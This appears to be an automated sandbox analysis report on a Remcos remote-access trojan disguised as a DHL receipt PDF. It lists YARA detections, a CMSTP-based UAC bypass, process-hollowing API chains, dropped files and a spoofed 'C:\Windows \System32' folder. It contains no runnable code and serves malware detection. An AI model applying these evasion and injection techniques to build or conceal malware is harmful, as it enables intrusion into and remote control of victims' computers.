Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DHL119040 receipt document,pdf.exe
Source: initial sample Static PE information: Filename: DHL119040 receipt document,pdf.exe
Abnormal high CPU Usage
Source: C:\ProgramData\Remcos\remcos.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_028BC7B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_028BC724
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory, 0_2_028B7A94
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BDA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess, 0_2_028BDA24
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_028BC898
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess, 0_2_028BD9A4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_028B7944
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B81B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_028BC6AC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_028BC7B2
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory, 0_2_028B7A92
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_028B7942
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5BB35 OpenProcess,NtResumeProcess,CloseHandle, 0_2_2DA5BB35
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5BB09 OpenProcess,NtSuspendProcess,CloseHandle, 0_2_2DA5BB09
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 0_2_2DA532D2
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7A94 NtWriteVirtualMemory, 5_2_028F7A94
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028FDA24 NtQueryInformationProcess, 5_2_028FDA24
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028FC898 NtOpenFile,NtReadFile, 5_2_028FC898
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028FD9A4 NtQueryInformationProcess, 5_2_028FD9A4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7944 NtAllocateVirtualMemory, 5_2_028F7944
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7A92 NtWriteVirtualMemory, 5_2_028F7A92
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7942 NtAllocateVirtualMemory, 5_2_028F7942
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, 5_2_2D5BD58F
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 5_2_2D5B80EF
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BBB09 OpenProcess,NtSuspendProcess,CloseHandle, 5_2_2D5BBB09
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BBB35 OpenProcess,NtResumeProcess,CloseHandle, 5_2_2D5BBB35
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile, 5_2_2D5B32D2
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken, 7_2_00007FF7689C89E4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 7_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C898C NtQueryInformationToken, 7_2_00007FF7689C898C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 7_2_00007FF7689C7FF8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 7_2_00007FF7689C88C0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 7_2_00007FF7689C8114
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 7_2_00007FF7689DBCF0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken, 8_2_00007FF7689C89E4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 8_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 8_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C898C NtQueryInformationToken, 8_2_00007FF7689C898C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 8_2_00007FF7689C7FF8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 8_2_00007FF7689C88C0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 8_2_00007FF7689C8114
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 8_2_00007FF7689DBCF0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C89E4 NtQueryInformationToken,NtQueryInformationToken, 11_2_00007FF7689C89E4
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689E1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 11_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689B3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 11_2_00007FF7689B3D94
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C898C NtQueryInformationToken, 11_2_00007FF7689C898C
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError, 11_2_00007FF7689C7FF8
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose, 11_2_00007FF7689C88C0
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689C8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 11_2_00007FF7689C8114
Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7689DBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 11_2_00007FF7689DBCF0
Source: C:\Users\Public\ger.exe Code function: 19_2_00007FF6DF319890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey, 19_2_00007FF6DF319890
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_00401806 NtdllDefWindowProc_W, 20_2_00401806
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004018C0 NtdllDefWindowProc_W, 20_2_004018C0
Contains functionality to communicate with device drivers
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 7_2_00007FF7689B5240
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B8
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA567B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_2DA567B4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress, 5_2_2D5B67B9
Creates files inside the system directory
Source: C:\Users\Public\alpha.exe File created: C:\Windows Jump to behavior
Source: C:\Users\Public\alpha.exe File created: C:\Windows \System32 Jump to behavior
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
Deletes files inside the Windows folder
Source: C:\Users\Public\alpha.exe File deleted: C:\Windows \System32
Detected potential crypto function
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A20C4 0_2_028A20C4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA77D33 0_2_2DA77D33
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA76FEA 0_2_2DA76FEA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA53FCA 0_2_2DA53FCA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7DE9D 0_2_2DA7DE9D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA66E0E 0_2_2DA66E0E
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA75E5E 0_2_2DA75E5E
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA8D9C9 0_2_2DA8D9C9
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA73946 0_2_2DA73946
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA778FE 0_2_2DA778FE
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA67BAF 0_2_2DA67BAF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5DB62 0_2_2DA5DB62
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA67A46 0_2_2DA67A46
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7E558 0_2_2DA7E558
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA774E6 0_2_2DA774E6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA78770 0_2_2DA78770
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA861F0 0_2_2DA861F0
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA78168 0_2_2DA78168
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA94159 0_2_2DA94159
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5F0FA 0_2_2DA5F0FA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7E0CC 0_2_2DA7E0CC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA6739D 0_2_2DA6739D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA9332B 0_2_2DA9332B
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA7E2FB 0_2_2DA7E2FB
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040E800 1_2_0040E800
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040C838 1_2_0040C838
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040F1CA 1_2_0040F1CA
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_00411250 1_2_00411250
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004102D0 1_2_004102D0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_0040B2E7 1_2_0040B2E7
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004102F0 1_2_004102F0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004105F0 1_2_004105F0
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_00410673 1_2_00410673
Source: C:\Users\Public\Libraries\yfkwifxL.pif Code function: 1_2_004106B9 1_2_004106B9
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BD7194 5_2_45BD7194
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BCB5C1 5_2_45BCB5C1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028E20C4 5_2_028E20C4
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BDB62 5_2_2D5BDB62
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DE558 5_2_2D5DE558
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D74E6 5_2_2D5D74E6
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D6FEA 5_2_2D5D6FEA
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D5E5E 5_2_2D5D5E5E
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DDE9D 5_2_2D5DDE9D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D3946 5_2_2D5D3946
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5E61F0 5_2_2D5E61F0
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DE0CC 5_2_2D5DE0CC
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5D78FE 5_2_2D5D78FE
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5F332B 5_2_2D5F332B
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5DE2FB 5_2_2D5DE2FB
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C5554 7_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B7D30 7_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BAA54 7_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C37D8 7_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DD9D0 7_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B81D4 7_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B8DF8 7_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BCE10 7_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689E1538 7_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689D7F00 7_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B6EE4 7_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B5240 7_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BD250 7_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B9E50 7_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B7650 7_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B2220 7_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C4224 7_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B4A30 7_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DAA30 7_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BE680 7_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DEE88 7_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C0A6C 7_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DAFBC 7_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B3410 7_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B6BE0 7_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B9B50 7_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B372C 7_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B3F90 7_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B5B70 7_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C18D4 7_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B8510 7_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689BB0D8 7_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C7854 7_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689DAC4C 7_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B2C48 7_2_00007FF7689B2C48
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B1884 7_2_00007FF7689B1884
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C5554 8_2_00007FF7689C5554
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B7D30 8_2_00007FF7689B7D30
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BAA54 8_2_00007FF7689BAA54
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C37D8 8_2_00007FF7689C37D8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DD9D0 8_2_00007FF7689DD9D0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B81D4 8_2_00007FF7689B81D4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B8DF8 8_2_00007FF7689B8DF8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BCE10 8_2_00007FF7689BCE10
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689E1538 8_2_00007FF7689E1538
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689D7F00 8_2_00007FF7689D7F00
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B6EE4 8_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B5240 8_2_00007FF7689B5240
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BD250 8_2_00007FF7689BD250
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B9E50 8_2_00007FF7689B9E50
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B7650 8_2_00007FF7689B7650
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B2220 8_2_00007FF7689B2220
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C4224 8_2_00007FF7689C4224
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B4A30 8_2_00007FF7689B4A30
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DAA30 8_2_00007FF7689DAA30
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BE680 8_2_00007FF7689BE680
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DEE88 8_2_00007FF7689DEE88
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C0A6C 8_2_00007FF7689C0A6C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DAFBC 8_2_00007FF7689DAFBC
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B3410 8_2_00007FF7689B3410
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B6BE0 8_2_00007FF7689B6BE0
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B9B50 8_2_00007FF7689B9B50
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B372C 8_2_00007FF7689B372C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B3F90 8_2_00007FF7689B3F90
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B5B70 8_2_00007FF7689B5B70
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C18D4 8_2_00007FF7689C18D4
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B8510 8_2_00007FF7689B8510
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689BB0D8 8_2_00007FF7689BB0D8
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689C7854 8_2_00007FF7689C7854
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689DAC4C 8_2_00007FF7689DAC4C
Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF7689B2C48 8_2_00007FF7689B2C48
